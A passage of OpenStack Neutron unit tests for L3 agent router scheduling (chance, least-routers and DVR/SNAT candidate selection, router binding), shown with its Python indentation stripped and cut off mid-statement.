# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import datetime
import uuid
import mock
import testscenarios
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_utils import importutils
from oslo_utils import timeutils
from sqlalchemy.orm import query
from neutron.common import constants
from neutron import context as n_context
from neutron.db import agents_db
from neutron.db import common_db_mixin
from neutron.db import db_base_plugin_v2 as db_v2
from neutron.db import l3_agentschedulers_db
from neutron.db import l3_db
from neutron.db import l3_dvrscheduler_db
from neutron.db import l3_hamode_db
from neutron.db import l3_hascheduler_db
from neutron.extensions import l3agentscheduler as l3agent
from neutron import manager
from neutron.scheduler import l3_agent_scheduler
from neutron.tests import base
from neutron.tests.common import helpers
from neutron.tests.unit.db import test_db_base_plugin_v2
from neutron.tests.unit.extensions import test_l3
from neutron.tests.unit import testlib_api
# the below code is required for the following reason
# (as documented in testscenarios)
"""Multiply tests depending on their 'scenarios' attribute.
This can be assigned to 'load_tests' in any test module to make this
automatically work across tests in the module.
"""
load_tests = testscenarios.load_tests_apply_scenarios
HOST_DVR = 'my_l3_host_dvr'
HOST_DVR_SNAT = 'my_l3_host_dvr_snat'
class FakeL3Scheduler(l3_agent_scheduler.L3Scheduler):
def schedule(self):
pass
def _choose_router_agent(self):
pass
def _choose_router_agents_for_ha(self):
pass
class FakePortDB(object):
def __init__(self, port_list):
self._port_list = port_list
def _get_query_answer(self, port_list, filters):
answers = []
for port in port_list:
matched = True
for key, search_values in filters.items():
port_value = port.get(key, None)
if not port_value:
matched = False
break
if isinstance(port_value, list):
sub_answers = self._get_query_answer(port_value,
search_values)
matched = len(sub_answers) > 0
else:
matched = port_value in search_values
if not matched:
break
if matched:
answers.append(port)
return answers
def get_port(self, context, port_id):
for port in self._port_list:
if port['id'] == port_id:
if port['tenant_id'] == context.tenant_id or context.is_admin:
return port
break
return None
def get_ports(self, context, filters=None):
query_filters = dict()
if filters:
query_filters.update(filters)
if not context.is_admin:
query_filters['tenant_id'] = [context.tenant_id]
result = self._get_query_answer(self._port_list, query_filters)
return result
class L3SchedulerBaseTestCase(base.BaseTestCase):
def setUp(self):
super(L3SchedulerBaseTestCase, self).setUp()
self.scheduler = FakeL3Scheduler()
self.plugin = mock.Mock()
def test_auto_schedule_routers(self):
self.plugin.get_enabled_agent_on_host.return_value = [mock.ANY]
with mock.patch.object(self.scheduler,
'_get_routers_to_schedule') as gs,\
mock.patch.object(self.scheduler,
'_get_routers_can_schedule') as gr:
result = self.scheduler.auto_schedule_routers(
self.plugin, mock.ANY, mock.ANY, mock.ANY)
self.assertTrue(self.plugin.get_enabled_agent_on_host.called)
self.assertTrue(result)
self.assertTrue(gs.called)
self.assertTrue(gr.called)
def test_auto_schedule_routers_no_agents(self):
self.plugin.get_enabled_agent_on_host.return_value = None
result = self.scheduler.auto_schedule_routers(
self.plugin, mock.ANY, mock.ANY, mock.ANY)
self.assertTrue(self.plugin.get_enabled_agent_on_host.called)
self.assertFalse(result)
def test_auto_schedule_routers_no_unscheduled_routers(self):
type(self.plugin).supported_extension_aliases = (
mock.PropertyMock(return_value=[]))
with mock.patch.object(self.scheduler,
'_get_routers_to_schedule') as mock_routers:
mock_routers.return_value = []
result = self.scheduler.auto_schedule_routers(
self.plugin, mock.ANY, mock.ANY, mock.ANY)
self.assertTrue(self.plugin.get_enabled_agent_on_host.called)
self.assertFalse(result)
def test_auto_schedule_routers_no_target_routers(self):
self.plugin.get_enabled_agent_on_host.return_value = [mock.ANY]
with mock.patch.object(
self.scheduler,
'_get_routers_to_schedule') as mock_unscheduled_routers,\
mock.patch.object(
self.scheduler,
'_get_routers_can_schedule') as mock_target_routers:
mock_unscheduled_routers.return_value = mock.ANY
mock_target_routers.return_value = None
result = self.scheduler.auto_schedule_routers(
self.plugin, mock.ANY, mock.ANY, mock.ANY)
self.assertTrue(self.plugin.get_enabled_agent_on_host.called)
self.assertFalse(result)
def test__get_routers_to_schedule_with_router_ids(self):
router_ids = ['foo_router_1', 'foo_router_2']
expected_routers = [
{'id': 'foo_router1'}, {'id': 'foo_router_2'}
]
self.plugin.get_routers.return_value = expected_routers
with mock.patch.object(self.scheduler,
'_filter_unscheduled_routers') as mock_filter:
mock_filter.return_value = expected_routers
unscheduled_routers = self.scheduler._get_routers_to_schedule(
mock.ANY, self.plugin, router_ids)
mock_filter.assert_called_once_with(
mock.ANY, self.plugin, expected_routers)
self.assertEqual(expected_routers, unscheduled_routers)
def test__get_routers_to_schedule_without_router_ids(self):
expected_routers = [
{'id': 'foo_router1'}, {'id': 'foo_router_2'}
]
with mock.patch.object(self.scheduler,
'_get_unscheduled_routers') as mock_get:
mock_get.return_value = expected_routers
unscheduled_routers = self.scheduler._get_routers_to_schedule(
mock.ANY, self.plugin)
mock_get.assert_called_once_with(mock.ANY, self.plugin)
self.assertEqual(expected_routers, unscheduled_routers)
def test__get_routers_to_schedule_exclude_distributed(self):
routers = [
{'id': 'foo_router1', 'distributed': True}, {'id': 'foo_router_2'}
]
expected_routers = [{'id': 'foo_router_2'}]
with mock.patch.object(self.scheduler,
'_get_unscheduled_routers') as mock_get:
mock_get.return_value = routers
unscheduled_routers = self.scheduler._get_routers_to_schedule(
mock.ANY, self.plugin,
router_ids=None, exclude_distributed=True)
mock_get.assert_called_once_with(mock.ANY, self.plugin)
self.assertEqual(expected_routers, unscheduled_routers)
def _test__get_routers_can_schedule(self, routers, agent, target_routers):
self.plugin.get_l3_agent_candidates.return_value = agent
result = self.scheduler._get_routers_can_schedule(
mock.ANY, self.plugin, routers, mock.ANY)
self.assertEqual(target_routers, result)
def _test__filter_unscheduled_routers(self, routers, agents, expected):
self.plugin.get_l3_agents_hosting_routers.return_value = agents
unscheduled_routers = self.scheduler._filter_unscheduled_routers(
mock.ANY, self.plugin, routers)
self.assertEqual(expected, unscheduled_routers)
def test__filter_unscheduled_routers_already_scheduled(self):
self._test__filter_unscheduled_routers(
[{'id': 'foo_router1'}, {'id': 'foo_router_2'}],
[{'id': 'foo_agent_id'}], [])
def test__filter_unscheduled_routers_non_scheduled(self):
self._test__filter_unscheduled_routers(
[{'id': 'foo_router1'}, {'id': 'foo_router_2'}],
None, [{'id': 'foo_router1'}, {'id': 'foo_router_2'}])
def test__get_routers_can_schedule_with_compat_agent(self):
routers = [{'id': 'foo_router'}]
self._test__get_routers_can_schedule(routers, mock.ANY, routers)
def test__get_routers_can_schedule_with_no_compat_agent(self):
routers = [{'id': 'foo_router'}]
self._test__get_routers_can_schedule(routers, None, [])
def test__bind_routers_centralized(self):
routers = [{'id': 'foo_router'}]
with mock.patch.object(self.scheduler, 'bind_router') as mock_bind:
self.scheduler._bind_routers(mock.ANY, mock.ANY, routers, mock.ANY)
mock_bind.assert_called_once_with(mock.ANY, 'foo_router', mock.ANY)
def _test__bind_routers_ha(self, has_binding):
routers = [{'id': 'foo_router', 'ha': True, 'tenant_id': '42'}]
agent = agents_db.Agent(id='foo_agent')
with mock.patch.object(self.scheduler,
'_router_has_binding',
return_value=has_binding) as mock_has_binding,\
mock.patch.object(self.scheduler,
'_create_ha_router_binding') as mock_bind:
self.scheduler._bind_routers(mock.ANY, mock.ANY, routers, agent)
mock_has_binding.assert_called_once_with(mock.ANY, 'foo_router',
'foo_agent')
self.assertEqual(not has_binding, mock_bind.called)
def test__bind_routers_ha_has_binding(self):
self._test__bind_routers_ha(has_binding=True)
def test__bind_routers_ha_no_binding(self):
self._test__bind_routers_ha(has_binding=False)
class L3SchedulerBaseMixin(object):
def _register_l3_agents(self, plugin=None):
self.agent1 = helpers.register_l3_agent(
'host_1', constants.L3_AGENT_MODE_LEGACY)
self.agent_id1 = self.agent1.id
self.agent2 = helpers.register_l3_agent(
'host_2', constants.L3_AGENT_MODE_LEGACY)
self.agent_id2 = self.agent2.id
def _register_l3_dvr_agents(self):
self.l3_dvr_agent = helpers.register_l3_agent(
HOST_DVR, constants.L3_AGENT_MODE_DVR)
self.l3_dvr_agent_id = self.l3_dvr_agent.id
self.l3_dvr_snat_agent = helpers.register_l3_agent(
HOST_DVR_SNAT, constants.L3_AGENT_MODE_DVR_SNAT)
self.l3_dvr_snat_id = self.l3_dvr_snat_agent.id
def _set_l3_agent_admin_state(self, context, agent_id, state=True):
update = {'agent': {'admin_state_up': state}}
self.plugin.update_agent(context, agent_id, update)
def _set_l3_agent_dead(self, agent_id):
update = {
'agent': {
'heartbeat_timestamp':
timeutils.utcnow() - datetime.timedelta(hours=1)}}
self.plugin.update_agent(self.adminContext, agent_id, update)
@contextlib.contextmanager
def router_with_ext_gw(self, name='router1', admin_state_up=True,
fmt=None, tenant_id=str(uuid.uuid4()),
external_gateway_info=None,
subnet=None, set_context=False,
**kwargs):
router = self._make_router(fmt or self.fmt, tenant_id, name,
admin_state_up, external_gateway_info,
set_context, **kwargs)
self._add_external_gateway_to_router(
router['router']['id'],
subnet['subnet']['network_id'])
yield router
self._remove_external_gateway_from_router(
router['router']['id'], subnet['subnet']['network_id'])
self._delete('routers', router['router']['id'])
class L3SchedulerTestBaseMixin(object):
def _test_add_router_to_l3_agent(self,
distributed=False,
already_scheduled=False,
external_gw=None):
agent_id = self.agent_id1
agent = self.agent1
if distributed:
self._register_l3_dvr_agents()
agent_id = self.l3_dvr_snat_id
agent = self.l3_dvr_snat_agent
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r1')
router['router']['distributed'] = distributed
router['router']['external_gateway_info'] = external_gw
if already_scheduled:
self._test_schedule_bind_router(agent, router)
with mock.patch.object(self, "validate_agent_router_combination"),\
mock.patch.object(self,
"create_router_to_agent_binding") as auto_s,\
mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
return_value=router['router']):
self.add_router_to_l3_agent(self.adminContext, agent_id,
router['router']['id'])
self.assertNotEqual(already_scheduled, auto_s.called)
def test__unbind_router_removes_binding(self):
agent_id = self.agent_id1
agent = self.agent1
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r1')
self._test_schedule_bind_router(agent, router)
self._unbind_router(self.adminContext,
router['router']['id'],
agent_id)
bindings = self._get_l3_bindings_hosting_routers(
self.adminContext, [router['router']['id']])
self.assertEqual(0, len(bindings))
def _create_router_for_l3_agent_dvr_test(self,
distributed=False,
external_gw=None):
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r1')
router['router']['distributed'] = distributed
router['router']['external_gateway_info'] = external_gw
return router
def _prepare_l3_agent_dvr_move_exceptions(self,
distributed=False,
external_gw=None,
agent_id=None,
expected_exception=None):
router = self._create_router_for_l3_agent_dvr_test(
distributed=distributed, external_gw=external_gw)
with mock.patch.object(self, "create_router_to_agent_binding"),\
mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
return_value=router['router']):
self.assertRaises(expected_exception,
self.add_router_to_l3_agent,
self.adminContext, agent_id,
router['router']['id'])
def test_add_router_to_l3_agent_mismatch_error_dvr_to_legacy(self):
self._register_l3_agents()
self._prepare_l3_agent_dvr_move_exceptions(
distributed=True,
agent_id=self.agent_id1,
expected_exception=l3agent.RouterL3AgentMismatch)
def test_add_router_to_l3_agent_mismatch_error_legacy_to_dvr(self):
self._register_l3_dvr_agents()
self._prepare_l3_agent_dvr_move_exceptions(
agent_id=self.l3_dvr_agent_id,
expected_exception=l3agent.RouterL3AgentMismatch)
def test_add_router_to_l3_agent_mismatch_error_dvr_to_dvr(self):
self._register_l3_dvr_agents()
self._prepare_l3_agent_dvr_move_exceptions(
distributed=True,
agent_id=self.l3_dvr_agent_id,
expected_exception=l3agent.DVRL3CannotAssignToDvrAgent)
def test_add_router_to_l3_agent_dvr_to_snat(self):
external_gw_info = {
"network_id": str(uuid.uuid4()),
"enable_snat": True
}
self._register_l3_dvr_agents()
agent_id = self.l3_dvr_snat_id
router = self._create_router_for_l3_agent_dvr_test(
distributed=True,
external_gw=external_gw_info)
with mock.patch.object(self, "validate_agent_router_combination"),\
mock.patch.object(
self,
"create_router_to_agent_binding") as rtr_agent_binding,\
mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
return_value=router['router']):
self.add_router_to_l3_agent(self.adminContext, agent_id,
router['router']['id'])
rtr_agent_binding.assert_called_once_with(
self.adminContext, mock.ANY, router['router'])
def test_add_router_to_l3_agent(self):
self._test_add_router_to_l3_agent()
def test_add_distributed_router_to_l3_agent(self):
external_gw_info = {
"network_id": str(uuid.uuid4()),
"enable_snat": True
}
self._test_add_router_to_l3_agent(distributed=True,
external_gw=external_gw_info)
def test_add_router_to_l3_agent_already_scheduled(self):
self._test_add_router_to_l3_agent(already_scheduled=True)
def test_add_distributed_router_to_l3_agent_already_scheduled(self):
external_gw_info = {
"network_id": str(uuid.uuid4()),
"enable_snat": True
}
self._test_add_router_to_l3_agent(distributed=True,
already_scheduled=True,
external_gw=external_gw_info)
def _prepare_schedule_dvr_tests(self):
scheduler = l3_agent_scheduler.ChanceScheduler()
agent = agents_db.Agent()
agent.admin_state_up = True
agent.heartbeat_timestamp = timeutils.utcnow()
plugin = mock.Mock()
plugin.get_l3_agents_hosting_routers.return_value = []
plugin.get_l3_agents.return_value = [agent]
plugin.get_l3_agent_candidates.return_value = [agent]
return scheduler, agent, plugin
def test_schedule_dvr_router_without_snatbinding_and_no_gw(self):
scheduler, agent, plugin = self._prepare_schedule_dvr_tests()
sync_router = {
'id': 'foo_router_id',
'distributed': True
}
plugin.get_router.return_value = sync_router
with mock.patch.object(scheduler, 'bind_router'),\
mock.patch.object(plugin,
'get_snat_bindings',
return_value=False):
scheduler._schedule_router(
plugin, self.adminContext, 'foo_router_id', None)
expected_calls = [
mock.call.get_router(mock.ANY, 'foo_router_id'),
mock.call.get_l3_agents_hosting_routers(
mock.ANY, ['foo_router_id'], admin_state_up=True),
mock.call.get_l3_agents(mock.ANY, active=True),
mock.call.get_l3_agent_candidates(mock.ANY, sync_router, [agent]),
]
plugin.assert_has_calls(expected_calls)
def test_schedule_dvr_router_with_snatbinding_no_gw(self):
scheduler, agent, plugin = self._prepare_schedule_dvr_tests()
sync_router = {'id': 'foo_router_id',
'distributed': True}
plugin.get_router.return_value = sync_router
with mock.patch.object(plugin, 'get_snat_bindings', return_value=True):
scheduler._schedule_router(
plugin, self.adminContext, 'foo_router_id', None)
expected_calls = [
mock.call.get_router(mock.ANY, 'foo_router_id'),
mock.call.unbind_snat_servicenode(mock.ANY, 'foo_router_id'),
]
plugin.assert_has_calls(expected_calls)
def test_schedule_router_distributed(self):
scheduler, agent, plugin = self._prepare_schedule_dvr_tests()
sync_router = {
'id': 'foo_router_id',
'distributed': True,
'external_gateway_info': {
'network_id': str(uuid.uuid4()),
'enable_snat': True
}
}
plugin.get_router.return_value = sync_router
with mock.patch.object(
plugin, 'get_snat_bindings', return_value=False):
scheduler._schedule_router(
plugin, self.adminContext, 'foo_router_id', None)
expected_calls = [
mock.call.get_router(mock.ANY, 'foo_router_id'),
mock.call.schedule_snat_router(
mock.ANY, 'foo_router_id', sync_router),
]
plugin.assert_has_calls(expected_calls)
def _test_schedule_bind_router(self, agent, router):
ctx = self.adminContext
session = ctx.session
db = l3_agentschedulers_db.RouterL3AgentBinding
scheduler = l3_agent_scheduler.ChanceScheduler()
rid = router['router']['id']
scheduler.bind_router(ctx, rid, agent)
results = (session.query(db).filter_by(router_id=rid).all())
self.assertTrue(len(results) > 0)
self.assertIn(agent.id, [bind.l3_agent_id for bind in results])
def test_bind_new_router(self):
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r1')
with mock.patch.object(l3_agent_scheduler.LOG, 'debug') as flog:
self._test_schedule_bind_router(self.agent1, router)
self.assertEqual(1, flog.call_count)
args, kwargs = flog.call_args
self.assertIn('is scheduled', args[0])
def test_bind_absent_router(self):
scheduler = l3_agent_scheduler.ChanceScheduler()
# checking that bind_router() is not throwing
# when supplied with router_id of non-existing router
scheduler.bind_router(self.adminContext, "dummyID", self.agent1)
def test_bind_existing_router(self):
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r2')
self._test_schedule_bind_router(self.agent1, router)
with mock.patch.object(l3_agent_scheduler.LOG, 'debug') as flog:
self._test_schedule_bind_router(self.agent1, router)
self.assertEqual(1, flog.call_count)
args, kwargs = flog.call_args
self.assertIn('has already been scheduled', args[0])
def _check_get_l3_agent_candidates(
self, router, agent_list, exp_host, count=1):
candidates = self.get_l3_agent_candidates(self.adminContext,
router, agent_list)
self.assertEqual(len(candidates), count)
if count:
self.assertEqual(candidates[0]['host'], exp_host)
def test_get_l3_agent_candidates_legacy(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r2')
router['external_gateway_info'] = None
router['id'] = str(uuid.uuid4())
agent_list = [self.agent1, self.l3_dvr_agent]
# test legacy agent_mode case: only legacy agent should be candidate
router['distributed'] = False
exp_host = 'host_1'
self._check_get_l3_agent_candidates(router, agent_list, exp_host)
def test_get_l3_agent_candidates_dvr(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r2')
router['external_gateway_info'] = None
router['id'] = str(uuid.uuid4())
agent_list = [self.agent1, self.l3_dvr_agent]
# test dvr agent_mode case only dvr agent should be candidate
router['distributed'] = True
self.check_ports_exist_on_l3agent = mock.Mock(return_value=True)
self._check_get_l3_agent_candidates(router, agent_list, HOST_DVR)
def test_get_l3_agent_candidates_dvr_no_vms(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r2')
router['external_gateway_info'] = None
router['id'] = str(uuid.uuid4())
agent_list = [self.agent1, self.l3_dvr_agent]
router['distributed'] = True
# Test no VMs present case
self.check_ports_exist_on_l3agent = mock.Mock(return_value=False)
self._check_get_l3_agent_candidates(
router, agent_list, HOST_DVR, count=0)
def test_get_l3_agent_candidates_dvr_snat(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r2')
router['external_gateway_info'] = None
router['id'] = str(uuid.uuid4())
router['distributed'] = True
agent_list = [self.l3_dvr_snat_agent]
self.check_ports_exist_on_l3agent = mock.Mock(return_value=True)
self._check_get_l3_agent_candidates(router, agent_list, HOST_DVR_SNAT)
def test_get_l3_agent_candidates_dvr_snat_no_vms(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r2')
router['external_gateway_info'] = None
router['id'] = str(uuid.uuid4())
router['distributed'] = True
agent_list = [self.l3_dvr_snat_agent]
self.check_ports_exist_on_l3agent = mock.Mock(return_value=False)
# Test no VMs present case
self.check_ports_exist_on_l3agent.return_value = False
self._check_get_l3_agent_candidates(
router, agent_list, HOST_DVR_SNAT, count=0)
def test_get_l3_agent_candidates_centralized(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r2')
router['external_gateway_info'] = None
router['id'] = str(uuid.uuid4())
# check centralized test case
router['distributed'] = False
agent_list = [self.l3_dvr_snat_agent]
self._check_get_l3_agent_candidates(router, agent_list, HOST_DVR_SNAT)
def _prepare_check_ports_exist_tests(self):
l3_agent = agents_db.Agent()
l3_agent.admin_state_up = True
l3_agent.host = 'host_1'
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r2')
router['external_gateway_info'] = None
router['id'] = str(uuid.uuid4())
self.plugin.get_ports = mock.Mock(return_value=[])
self.get_subnet_ids_on_router = mock.Mock(return_value=[])
return l3_agent, router
def test_check_ports_exist_on_l3agent_no_subnets(self):
l3_agent, router = self._prepare_check_ports_exist_tests()
# no subnets
val = self.check_ports_exist_on_l3agent(self.adminContext,
l3_agent, router['id'])
self.assertFalse(val)
def test_check_ports_exist_on_l3agent_with_dhcp_enabled_subnets(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r2')
router['external_gateway_info'] = None
router['id'] = str(uuid.uuid4())
router['distributed'] = True
agent_list = [self.l3_dvr_snat_agent]
subnet = {'id': str(uuid.uuid4()),
'enable_dhcp': True}
self.get_subnet_ids_on_router = mock.Mock(
return_value=[subnet['id']])
self.plugin.get_subnet = mock.Mock(return_value=subnet)
self.plugin.get_ports = mock.Mock()
val = self.check_ports_exist_on_l3agent(
self.adminContext, agent_list[0], router['id'])
self.assertTrue(val)
self.assertFalse(self.plugin.get_ports.called)
def test_check_ports_exist_on_l3agent_if_no_subnets_then_return(self):
l3_agent, router = self._prepare_check_ports_exist_tests()
with mock.patch.object(manager.NeutronManager,
'get_plugin') as getp:
getp.return_value = self.plugin
# no subnets and operation is remove_router_interface,
# so return immediately without calling get_ports
self.check_ports_exist_on_l3agent(self.adminContext,
l3_agent, router['id'])
self.assertFalse(self.plugin.get_ports.called)
def test_check_ports_exist_on_l3agent_no_subnet_match(self):
l3_agent, router = self._prepare_check_ports_exist_tests()
# no matching subnet
self.plugin.get_subnet_ids_on_router = mock.Mock(
return_value=[str(uuid.uuid4())])
val = self.check_ports_exist_on_l3agent(self.adminContext,
l3_agent, router['id'])
self.assertFalse(val)
def test_check_ports_exist_on_l3agent_subnet_match(self):
l3_agent, router = self._prepare_check_ports_exist_tests()
# matching subnet
port = {'subnet_id': str(uuid.uuid4()),
'binding:host_id': 'host_1',
'device_owner': 'compute:',
'id': 1234}
subnet = {'id': str(uuid.uuid4()),
'enable_dhcp': False}
self.plugin.get_ports.return_value = [port]
self.get_subnet_ids_on_router = mock.Mock(
return_value=[port['subnet_id']])
self.plugin.get_subnet = mock.Mock(return_value=subnet)
val = self.check_ports_exist_on_l3agent(self.adminContext,
l3_agent, router['id'])
self.assertTrue(val)
def test_get_l3_agents_hosting_routers(self):
agent = helpers.register_l3_agent('host_6')
router = self._make_router(self.fmt,
tenant_id=str(uuid.uuid4()),
name='r1')
ctx = self.adminContext
router_id = router['router']['id']
self.plugin.router_scheduler.bind_router(ctx, router_id, agent)
agents = self.get_l3_agents_hosting_routers(ctx,
[router_id])
self.assertEqual([agent.id], [agt.id for agt in agents])
agents = self.get_l3_agents_hosting_routers(ctx,
[router_id],
admin_state_up=True)
self.assertEqual([agent.id], [agt.id for agt in agents])
self._set_l3_agent_admin_state(ctx, agent.id, False)
agents = self.get_l3_agents_hosting_routers(ctx,
[router_id])
self.assertEqual([agent.id], [agt.id for agt in agents])
agents = self.get_l3_agents_hosting_routers(ctx,
[router_id],
admin_state_up=True)
self.assertEqual([], agents)
class L3SchedulerTestCaseMixin(l3_agentschedulers_db.L3AgentSchedulerDbMixin,
l3_db.L3_NAT_db_mixin,
common_db_mixin.CommonDbMixin,
test_l3.L3NatTestCaseMixin,
L3SchedulerBaseMixin,
L3SchedulerTestBaseMixin):
def setUp(self):
self.mock_rescheduling = False
ext_mgr = test_l3.L3TestExtensionManager()
plugin_str = ('neutron.tests.unit.extensions.test_l3.'
'TestL3NatIntAgentSchedulingPlugin')
super(L3SchedulerTestCaseMixin, self).setUp(plugin=plugin_str,
ext_mgr=ext_mgr)
self.adminContext = n_context.get_admin_context()
self.plugin = manager.NeutronManager.get_plugin()
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.ChanceScheduler'
)
self._register_l3_agents()
class L3AgentChanceSchedulerTestCase(L3SchedulerTestCaseMixin,
test_db_base_plugin_v2.
NeutronDbPluginV2TestCase):
def test_random_scheduling(self):
random_patch = mock.patch('random.choice')
random_mock = random_patch.start()
def side_effect(seq):
return seq[0]
random_mock.side_effect = side_effect
with self.subnet() as subnet:
self._set_net_external(subnet['subnet']['network_id'])
with self.router_with_ext_gw(name='r1', subnet=subnet) as r1:
agents = self.get_l3_agents_hosting_routers(
self.adminContext, [r1['router']['id']],
admin_state_up=True)
self.assertEqual(len(agents), 1)
self.assertEqual(random_mock.call_count, 1)
with self.router_with_ext_gw(name='r2', subnet=subnet) as r2:
agents = self.get_l3_agents_hosting_routers(
self.adminContext, [r2['router']['id']],
admin_state_up=True)
self.assertEqual(len(agents), 1)
self.assertEqual(random_mock.call_count, 2)
random_patch.stop()
def test_scheduler_auto_schedule_when_agent_added(self):
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id1, False)
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id2, False)
with self.subnet() as subnet:
self._set_net_external(subnet['subnet']['network_id'])
with self.router_with_ext_gw(name='r1', subnet=subnet) as r1:
agents = self.get_l3_agents_hosting_routers(
self.adminContext, [r1['router']['id']],
admin_state_up=True)
self.assertEqual(0, len(agents))
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id1, True)
self.plugin.auto_schedule_routers(self.adminContext,
'host_1',
[r1['router']['id']])
agents = self.get_l3_agents_hosting_routers(
self.adminContext, [r1['router']['id']],
admin_state_up=True)
self.assertEqual('host_1', agents[0]['host'])
class L3AgentLeastRoutersSchedulerTestCase(L3SchedulerTestCaseMixin,
test_db_base_plugin_v2.
NeutronDbPluginV2TestCase):
def setUp(self):
super(L3AgentLeastRoutersSchedulerTestCase, self).setUp()
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.LeastRoutersScheduler'
)
def test_scheduler(self):
# disable one agent to force the scheduling to the only one.
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id2, False)
with self.subnet() as subnet:
self._set_net_external(subnet['subnet']['network_id'])
with self.router_with_ext_gw(name='r1', subnet=subnet) as r1:
agents = self.get_l3_agents_hosting_routers(
self.adminContext, [r1['router']['id']],
admin_state_up=True)
self.assertEqual(len(agents), 1)
agent_id1 = agents[0]['id']
with self.router_with_ext_gw(name='r2', subnet=subnet) as r2:
agents = self.get_l3_agents_hosting_routers(
self.adminContext, [r2['router']['id']],
admin_state_up=True)
self.assertEqual(len(agents), 1)
agent_id2 = agents[0]['id']
self.assertEqual(agent_id1, agent_id2)
# re-enable the second agent to see whether the next router
# spawned will be on this one.
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id2, True)
with self.router_with_ext_gw(name='r3',
subnet=subnet) as r3:
agents = self.get_l3_agents_hosting_routers(
self.adminContext, [r3['router']['id']],
admin_state_up=True)
self.assertEqual(len(agents), 1)
agent_id3 = agents[0]['id']
self.assertNotEqual(agent_id1, agent_id3)
class L3DvrScheduler(l3_db.L3_NAT_db_mixin,
l3_dvrscheduler_db.L3_DVRsch_db_mixin):
pass
class L3DvrSchedulerTestCase(testlib_api.SqlTestCase):
def setUp(self):
plugin = 'neutron.plugins.ml2.plugin.Ml2Plugin'
self.setup_coreplugin(plugin)
super(L3DvrSchedulerTestCase, self).setUp()
self.adminContext = n_context.get_admin_context()
self.dut = L3DvrScheduler()
def test__notify_port_delete(self):
plugin = manager.NeutronManager.get_plugin()
l3plugin = mock.Mock()
l3plugin.supported_extension_aliases = [
'router', constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS
]
with mock.patch.object(manager.NeutronManager,
'get_service_plugins',
return_value={'L3_ROUTER_NAT': l3plugin}):
kwargs = {
'context': self.adminContext,
'port': mock.ANY,
'removed_routers': [
{'agent_id': 'foo_agent', 'router_id': 'foo_id'},
],
}
l3_dvrscheduler_db._notify_port_delete(
'port', 'after_delete', plugin, **kwargs)
l3plugin.dvr_vmarp_table_update.assert_called_once_with(
self.adminContext, mock.ANY, 'del')
l3plugin.remove_router_from_l3_agent.assert_called_once_with(
self.adminContext, 'foo_agent', 'foo_id')
def test_dvr_update_router_addvm(self):
port = {
'device_id': 'abcd',
'device_owner': 'compute:nova',
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.3'
}
]
}
dvr_port = {
'id': 'dvr_port1',
'device_id': 'r1',
'device_owner': 'network:router_interface_distributed',
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.1'
}
]
}
r1 = {
'id': 'r1',
'distributed': True,
}
with mock.patch(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_ports',
return_value=[dvr_port]),\
mock.patch(
'neutron.manager.NeutronManager.get_service_plugins',
return_value=mock.Mock()),\
mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
return_value=r1),\
mock.patch('neutron.api.rpc.agentnotifiers.l3_rpc_agent_api'
'.L3AgentNotifyAPI'):
self.dut.dvr_update_router_addvm(self.adminContext, port)
def test_get_dvr_routers_by_portid(self):
dvr_port = {
'id': 'dvr_port1',
'device_id': 'r1',
'device_owner': 'network:router_interface_distributed',
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.1'
}
]
}
r1 = {
'id': 'r1',
'distributed': True,
}
with mock.patch(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_port',
return_value=dvr_port),\
mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2'
'.get_ports', return_value=[dvr_port]):
router_id = self.dut.get_dvr_routers_by_portid(self.adminContext,
dvr_port['id'])
self.assertEqual(router_id.pop(), r1['id'])
def test_get_subnet_ids_on_router(self):
dvr_port = {
'id': 'dvr_port1',
'device_id': 'r1',
'device_owner': 'network:router_interface_distributed',
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.1'
}
]
}
r1 = {
'id': 'r1',
'distributed': True,
}
with mock.patch(
